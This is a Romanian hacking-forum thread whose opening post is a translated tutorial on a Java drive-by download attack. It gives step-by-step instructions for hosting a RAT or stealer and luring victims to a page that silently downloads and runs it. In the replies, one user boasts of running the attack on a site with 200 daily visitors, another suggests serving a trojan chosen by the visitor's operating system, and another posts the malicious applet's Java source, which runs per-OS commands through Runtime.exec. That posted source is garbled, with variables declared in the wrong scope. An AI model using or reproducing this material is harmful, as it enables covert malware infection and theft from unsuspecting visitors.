Jump to content
sebywarlord

Java-Drive-By

By sebywarlord, in Tutoriale in romana

Recommended Posts

sebywarlord Newbie

sebywarlord

Posted
Posted (edited)

Ce este Java Drive-By Download?

Este o metoda prin care atacatorul ,implementeaz? pe site-ul lui niste coduri java ?i atunci când cineva viziteaz? pagina, un executabil care poate fi un RAT, WORM sau un VIRUS este desc?rcat ?i executat în sistemul s?u, f?r? stirea lui

Download Link Aici:

Java Drive by Download.rar

Acum sa incepem:

1.Uploadeaza-ti fisierul [RAT,STEALER,WARM etc] pe un host

Hostul trebuie sa aiba download direct fara timp de asteptare

ceva de forma

http;//siteuldeupload.com/fisierulmeu.exe

Deci fara timp de asteptare sau etc,intelegeti voi

2.Acum dezarhivam arhiva JavaDriveby

Intram in ea si editam index.html

Editam index.html ca in imaginea de mai jos

inloc de

Punem link-ul de la fisierul nostru

javadriveby11.jpg

3.Uploadati index.html si client.jar pe un host

Eu recomand

Create a Website for Free - Make a free website at T15.org

Incercati sa pacaliti victima sa intre pe site-ul creat

Atunci cand victima intra ii va aparea un request

Daca accepta , virusul v-a fii rulat pe sistemul victimei

:)

Cum lucreaza Java Drive-by?

Ai nevoie de 3 fisiere pentru a rula java-drive-by

1.virusul tau.exe

2.Client.jar ,applet-ul java care acceseaza CMD-ul iar mai tarziu creeaza si executa fisierul winconfig.vbs

3.index.html , care incorporeaza Client.jar si codurile care trebuie scrise in winconfig.vbs

javadriveby.jpg

Cam atata am avut de explicat,sper ca va este de ajutor

Tutorialul nu este facut de mine, eu doar l-am tradus in limba romana

Sursa english : Java Drive by Download: Tutorial and Explanation – Kerala Cyber Force | KCF

Edited by sebywarlord
  • Upvote 1
lutulik Newbie

lutulik

Posted
Posted
Bun tutorialul dar metoda nu mai este de actualitate...

Cum sa nu mai fie.

Eu l-am instalat cu succes pe un site.

Am peste 200 vizitatori pe zi si merge foarte bine.

Cheater Rookie

Cheater

Posted
Posted

Interesant cu java-drive-by este ca poti face un script simplu ce sa detecteze os-ul clientului, iar in functie de os sa descarce si sa acceseze un trojan/virus pt linux, mac, win. Tinand cont de cat de avansat e nivelul de securitate in fiecare os, si ce se poate obtine in functie de asta.

M2G Apprentice

M2G

Posted
Posted (edited)

Asta e sursa:

import java.applet.Applet;
import java.io.IOException;

public class Client extends Applet
{
  public void init()
  {
    String windows1 = getParameter("windows1");
    String windows2 = getParameter("windows2");
    String linux1 = getParameter("linux1");
    String linux2 = getParameter("linux2");
    String unix1 = getParameter("unix1");
    String unix2 = getParameter("unix2");
    String os = System.getProperty("os.name").toLowerCase();

    if (os.indexOf("win") >= 0)
    {
      try
      {
        Process w1 = Runtime.getRuntime().exec(windows1);
        w2 = Runtime.getRuntime().exec(windows2);
      }
      catch (IOException e)
      {
        Process w2;
        e.printStackTrace();
      }

    }

    if (os.indexOf("mac") >= 0)
    {
      try
      {
        Process u1 = Runtime.getRuntime().exec(unix1);
        u2 = Runtime.getRuntime().exec(unix2);
      }
      catch (IOException e)
      {
        Process u2;
        e.printStackTrace();
      }

    }

    if (os.indexOf("lin") >= 0)
    {
      try
      {
        Process l1 = Runtime.getRuntime().exec(linux1);
        l2 = Runtime.getRuntime().exec(linux2);
      }
      catch (IOException e)
      {
        Process l2;
        e.printStackTrace();
      }
    }
  }
}

Nu face altceva decat sa vada ce sistem de operare foloseste victima si sa lanseze scriptul aferent care e in fisierul html.

In cazul windows, se foloseste de visual basic script (vbs) pentru a downloada si rula executabilul infectat.

Edited by M2G
Guest
This topic is now closed to further replies.
Go to topic listing
×
×
  • Create New...